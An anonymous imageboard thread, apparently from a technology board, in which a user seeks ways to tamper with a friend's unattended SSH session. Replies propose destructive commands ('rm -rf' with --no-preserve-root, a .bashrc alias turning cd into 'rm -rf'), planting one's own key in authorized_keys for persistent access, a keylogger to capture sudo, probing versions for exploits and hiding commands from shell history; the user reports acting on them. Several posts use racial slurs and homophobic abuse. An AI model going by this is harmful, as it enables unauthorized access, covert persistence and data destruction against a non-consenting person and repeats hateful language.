so my friend forgot to logout from his ssh session and he always lecture about security. what can i do to mess with him?
change his password
Sudo rm -rf *
Dubs will confirm
>>51973432
rename all his files to "ihateniggersX.*" where x is a number to avoid name conflicts
>>51973451
i don't know current password
>>51973432
put hardcore gay porn everywhere
Has he used sudo recently? You can try to change his motd.
>>51973489
--no-preserve-root
Plant cp and call FBI you fucking mong
>>51973489
i don't know current password
>>51973500
just wan't it to be a psychological hit, not a pain in ass to restore
Add your own public key to his authorized_keys file. Run a key logger on his system to get his password/sudo. Free box.
>>51973525
unfortunately he sudoed to long ago, it askes me
>>51973556
roll for this
leave a nice message on his system to not forget to log out of an SSH and then log out.
>>51973504
Did he leave it logged in as root / can it sudo? If so should be able to change password of any user.
Ok i'm not root and everything you said seams to require that. guess Linux is kinda secure after all
>>51973653
do uname -r
And check the bash version.
>>51973653
>scp yourbox:~/.ssh/rsa_id.pub ~/.ssh/
>cd ~/.ssh; echo rsa_id.pub >> authorized_keys
>ssh hisname@hisbox
Now you have access in case he kills your session. Use it to take control.
>>51973683
3.16.0-4-amd64
>>51973653
Just hit backspace 27 times
>>51973867
That doesn't work remotely, plus he probably got it patched already.
>>51973911
It's a meme you dip
>>51973945
oh please, just because it got minor amount of attention doesn't mean it's a meme.
>>51973867
His friend forgot to logout from his ssh session, he didn't leave his machine with unpatched GRUB2 running in the street.
>>51973687
This is the first thing you should do, OP.
>>51973525
>>51973630
Mix these two ideas. Place a warning in his bashrc or add some silly aliases swtching commands.
You can also trap him chsh to some C program of your own, but I can't remember if chsh needs superuser permissions.
>>51973970
>>51973945
>>51973599
The Lord has spoken
>>51973653
Change his home directory's group ownership to people_who_dont_log_out_of_ssh
Good Ideas:
>>51973511
>>51973556
in addition, try editing his .xinitrc to open gay porn upon starting
>>51973753
>3.16
>He patched everything
Ayy lmao nigga's using outdated kernels.
Check the Bash version I'm pretty sure the nigger is still pre hearthbleed.
>>51974461
>tfw that's what kernel version debian jessie is at
well guys I spent couple of hours trying your tricks but I think his security settings or custom firewall stopped me in the end. thank you all for being good sport. at least I left som naughty txt files
add to their .bashrc:
> alias cd='rm -rf'
>>51974832
10/10
>>51974832
>>51973543
users can change their own passwords jesus christ /g/
OP, type passwd and click enter :)
Whatever you do, put a space before your commands so that they don't show up in history
